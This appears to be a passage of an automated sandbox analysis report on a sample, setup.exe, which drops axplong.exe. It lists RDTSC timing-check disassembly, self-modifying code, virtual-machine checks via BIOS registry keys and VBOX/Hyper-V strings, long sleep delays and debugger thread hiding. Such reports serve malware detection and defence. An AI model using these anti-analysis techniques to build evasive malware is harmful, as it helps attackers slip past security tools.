Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4F4013E second address: 4F40159 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F484B2BBA86h 0x0000000e pushad 0x0000000f mov dx, cx 0x00000012 popad 0x00000013 mov ecx, eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4F40159 second address: 4F40176 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4F40285 second address: 4F4028B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4F4028B second address: 4F402AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, dx 0x00000006 mov si, bx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e jmp 00007F47D8E3B0ABh 0x00000013 pop ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4F402AB second address: 4F402AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4F402AF second address: 4F402B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4F402B5 second address: 4F402BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4F402BB second address: 4F402BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4EF00A8 second address: 4EF00DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F47D8E48277h 0x00000008 push ecx 0x00000009 pop edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d and esp, FFFFFFF8h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F47D8E4826Ch 0x00000019 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4EF00DA second address: 4EF00DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4EF00DE second address: 4EF00E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4EF00E4 second address: 4EF0168 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a jmp 00007F47D8E3B0B0h 0x0000000f push eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F47D8E3B0B1h 0x00000017 adc si, 1266h 0x0000001c jmp 00007F47D8E3B0B1h 0x00000021 popfd 0x00000022 pushfd 0x00000023 jmp 00007F47D8E3B0B0h 0x00000028 or al, 00000008h 0x0000002b jmp 00007F47D8E3B0ABh 0x00000030 popfd 0x00000031 popad 0x00000032 xchg eax, ecx 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F47D8E3B0B0h 0x0000003c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4EF0168 second address: 4EF016C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4EF016C second address: 4EF0172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4EF0172 second address: 4EF0178 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4EF0178 second address: 4EF017C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4EF017C second address: 4EF01D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F47D8E48272h 0x00000010 or ax, F6C8h 0x00000015 jmp 00007F47D8E4826Bh 0x0000001a popfd 0x0000001b mov bl, cl 0x0000001d popad 0x0000001e push eax 0x0000001f pushad 0x00000020 mov dx, cx 0x00000023 jmp 00007F47D8E4826Ch 0x00000028 popad 0x00000029 xchg eax, ebx 0x0000002a pushad 0x0000002b mov dx, ax 0x0000002e mov di, si 0x00000031 popad 0x00000032 mov ebx, dword ptr [ebp+10h] 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F47D8E4826Bh 0x0000003c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4EF01D8 second address: 4EF020B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F47D8E3B0AFh 0x00000008 pop ecx 0x00000009 mov cx, dx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F47D8E3B0B7h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4EF020B second address: 4EF0223 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47D8E48274h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4EF0223 second address: 4EF0233 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], esi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e mov bh, 2Dh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4EF0233 second address: 4EF026D instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 7FE5F4DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov si, 03B7h 0x0000000d popad 0x0000000e mov esi, dword ptr [ebp+08h] 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushfd 0x00000015 jmp 00007F47D8E48276h 0x0000001a adc ch, FFFFFFD8h 0x0000001d jmp 00007F47D8E4826Bh 0x00000022 popfd 0x00000023 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4EF026D second address: 4EF02E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F47D8E3B0B9h 0x00000014 or eax, 31A7DED6h 0x0000001a jmp 00007F47D8E3B0B1h 0x0000001f popfd 0x00000020 pushfd 0x00000021 jmp 00007F47D8E3B0B0h 0x00000026 sbb esi, 32CCB4F8h 0x0000002c jmp 00007F47D8E3B0ABh 0x00000031 popfd 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4EF02E4 second address: 4EF02EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4EF02EA second address: 4EF034E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], edi 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F47D8E3B0ABh 0x00000017 or ch, 0000006Eh 0x0000001a jmp 00007F47D8E3B0B9h 0x0000001f popfd 0x00000020 pushfd 0x00000021 jmp 00007F47D8E3B0B0h 0x00000026 or eax, 7AC560E8h 0x0000002c jmp 00007F47D8E3B0ABh 0x00000031 popfd 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4EF034E second address: 4EF038C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 598Ah 0x00000007 pushfd 0x00000008 jmp 00007F47D8E4826Bh 0x0000000d add eax, 3A82C82Eh 0x00000013 jmp 00007F47D8E48279h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c test esi, esi 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4EF038C second address: 4EF0392 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4EF0392 second address: 4EF045F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 64F2h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007F484B3064DFh 0x00000010 pushad 0x00000011 push ebx 0x00000012 pushfd 0x00000013 jmp 00007F47D8E48272h 0x00000018 add eax, 2261A808h 0x0000001e jmp 00007F47D8E4826Bh 0x00000023 popfd 0x00000024 pop esi 0x00000025 movsx edi, ax 0x00000028 popad 0x00000029 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000030 pushad 0x00000031 mov di, si 0x00000034 mov ax, BF49h 0x00000038 popad 0x00000039 je 00007F484B3064B3h 0x0000003f jmp 00007F47D8E48274h 0x00000044 mov edx, dword ptr [esi+44h] 0x00000047 jmp 00007F47D8E48270h 0x0000004c or edx, dword ptr [ebp+0Ch] 0x0000004f pushad 0x00000050 pushfd 0x00000051 jmp 00007F47D8E4826Eh 0x00000056 and ah, FFFFFFF8h 0x00000059 jmp 00007F47D8E4826Bh 0x0000005e popfd 0x0000005f movzx esi, bx 0x00000062 popad 0x00000063 test edx, 61000000h 0x00000069 jmp 00007F47D8E4826Bh 0x0000006e jne 00007F484B3064ACh 0x00000074 push eax 0x00000075 push edx 0x00000076 jmp 00007F47D8E48275h 0x0000007b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4EF045F second address: 4EF0502 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F47D8E3B0B7h 0x00000009 adc ah, FFFFFFCEh 0x0000000c jmp 00007F47D8E3B0B9h 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 test byte ptr [esi+48h], 00000001h 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F47D8E3B0B3h 0x00000020 sbb cx, 03DEh 0x00000025 jmp 00007F47D8E3B0B9h 0x0000002a popfd 0x0000002b jmp 00007F47D8E3B0B0h 0x00000030 popad 0x00000031 jne 00007F484B2F9264h 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F47D8E3B0B7h 0x0000003e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4EF0502 second address: 4EF0553 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E48279h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test bl, 00000007h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F47D8E48276h 0x00000015 jmp 00007F47D8E48275h 0x0000001a popfd 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4EE0812 second address: 4EE08B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F47D8E3B0B3h 0x0000000b xor cx, 66BEh 0x00000010 jmp 00007F47D8E3B0B9h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebx 0x0000001a jmp 00007F47D8E3B0AEh 0x0000001f push eax 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007F47D8E3B0B1h 0x00000027 xor cx, 23A6h 0x0000002c jmp 00007F47D8E3B0B1h 0x00000031 popfd 0x00000032 mov edx, esi 0x00000034 popad 0x00000035 xchg eax, ebx 0x00000036 jmp 00007F47D8E3B0AAh 0x0000003b xchg eax, esi 0x0000003c pushad 0x0000003d call 00007F47D8E3B0AEh 0x00000042 mov ax, CF51h 0x00000046 pop eax 0x00000047 movsx ebx, ax 0x0000004a popad 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4EE08B5 second address: 4EE08B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4EE08B9 second address: 4EE08BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4EE08BF second address: 4EE08C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4EE08C5 second address: 4EE08C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4EE08C9 second address: 4EE08F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E4826Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F47D8E48275h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4EE08F6 second address: 4EE0906 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47D8E3B0ACh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4EE0906 second address: 4EE0954 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+08h] 0x0000000b pushad 0x0000000c mov bl, 4Ch 0x0000000e push ecx 0x0000000f pushfd 0x00000010 jmp 00007F47D8E48275h 0x00000015 or cx, 7286h 0x0000001a jmp 00007F47D8E48271h 0x0000001f popfd 0x00000020 pop ecx 0x00000021 popad 0x00000022 mov ebx, 00000000h 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a pushad 0x0000002b popad 0x0000002c mov edx, 1973281Ah 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4EE0954 second address: 4EE0982 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, si 0x00000006 jmp 00007F47D8E3B0AAh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e test esi, esi 0x00000010 pushad 0x00000011 mov dx, ax 0x00000014 mov cx, 49E9h 0x00000018 popad 0x00000019 je 00007F484B300AC2h 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 mov dx, EC34h 0x00000026 pushad 0x00000027 popad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4EE0982 second address: 4EE0995 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47D8E4826Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4EE0995 second address: 4EE0999 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4EE0999 second address: 4EE09DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000000f jmp 00007F47D8E48275h 0x00000014 mov ecx, esi 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F47D8E48278h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4EE09DB second address: 4EE09EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4EE09EA second address: 4EE09F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4EE09F0 second address: 4EE0A6B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F484B300A48h 0x00000011 pushad 0x00000012 mov cl, 00h 0x00000014 mov bx, 5B84h 0x00000018 popad 0x00000019 test byte ptr [77436968h], 00000002h 0x00000020 jmp 00007F47D8E3B0B3h 0x00000025 jne 00007F484B300A33h 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007F47D8E3B0B4h 0x00000032 sub al, 00000068h 0x00000035 jmp 00007F47D8E3B0ABh 0x0000003a popfd 0x0000003b pushad 0x0000003c push eax 0x0000003d pop edi 0x0000003e mov eax, 13FCA6F1h 0x00000043 popad 0x00000044 popad 0x00000045 mov edx, dword ptr [ebp+0Ch] 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b mov di, BFDCh 0x0000004f push edx 0x00000050 pop eax 0x00000051 popad 0x00000052 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4EE0A6B second address: 4EE0B25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E4826Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F47D8E4826Eh 0x00000011 adc ax, 0028h 0x00000016 jmp 00007F47D8E4826Bh 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007F47D8E48278h 0x00000022 sbb al, FFFFFF88h 0x00000025 jmp 00007F47D8E4826Bh 0x0000002a popfd 0x0000002b popad 0x0000002c push eax 0x0000002d pushad 0x0000002e mov ecx, edi 0x00000030 mov si, di 0x00000033 popad 0x00000034 xchg eax, ebx 0x00000035 pushad 0x00000036 mov edx, 22F91ECEh 0x0000003b pushfd 0x0000003c jmp 00007F47D8E4826Fh 0x00000041 sub esi, 2F50D77Eh 0x00000047 jmp 00007F47D8E48279h 0x0000004c popfd 0x0000004d popad 0x0000004e xchg eax, ebx 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007F47D8E48278h 0x00000058 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4EE0B25 second address: 4EE0B34 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4EE0B34 second address: 4EE0B87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F47D8E4826Fh 0x00000009 sub eax, 55E4A6EEh 0x0000000f jmp 00007F47D8E48279h 0x00000014 popfd 0x00000015 mov eax, 65277277h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push eax 0x0000001e jmp 00007F47D8E4826Dh 0x00000023 xchg eax, ebx 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 mov al, bh 0x00000029 mov di, si 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4EE0B87 second address: 4EE0B9A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 21h 0x00000005 mov ebx, esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push dword ptr [ebp+14h] 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4EE0B9A second address: 4EE0B9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4EE0B9E second address: 4EE0BA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4EE0BA4 second address: 4EE0BAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\setup.exe	Special instruction interceptor: First address: 1FEAA8 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\setup.exe	Special instruction interceptor: First address: 1FE9EC instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\setup.exe	Special instruction interceptor: First address: 43ADE1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: 56EAA8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: 56E9EC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: 7AADE1 instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\setup.exe

Code function: 0_2_04F600B8 rdtsc

0_2_04F600B8

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Thread delayed: delay time: 180000

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 867	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 1178	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 436	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 837	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 1182	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 483	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4568	Thread sleep time: -58029s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3412	Thread sleep count: 867 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3412	Thread sleep time: -1734867s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3728	Thread sleep count: 1178 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3728	Thread sleep time: -2357178s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 716	Thread sleep count: 436 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 716	Thread sleep time: -13080000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 2016	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5232	Thread sleep count: 837 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5232	Thread sleep time: -1674837s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1280	Thread sleep count: 1182 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1280	Thread sleep time: -2365182s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 2936	Thread sleep count: 483 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 2936	Thread sleep time: -966483s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\setup.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 30000			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 180000			Jump to behavior

Source: axplong.exe, axplong.exe, 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWM)
Source: axplong.exe, 00000004.00000002.3321500762.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: setup.exe, 00000000.00000002.2129130568.0000000000389000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000002.00000002.2157885886.00000000006F9000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000003.00000002.2166485787.00000000006F9000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,

Source: C:\Users\user\Desktop\setup.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\setup.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\setup.exe	Thread information set: HideFromDebugger	Jump to behavior
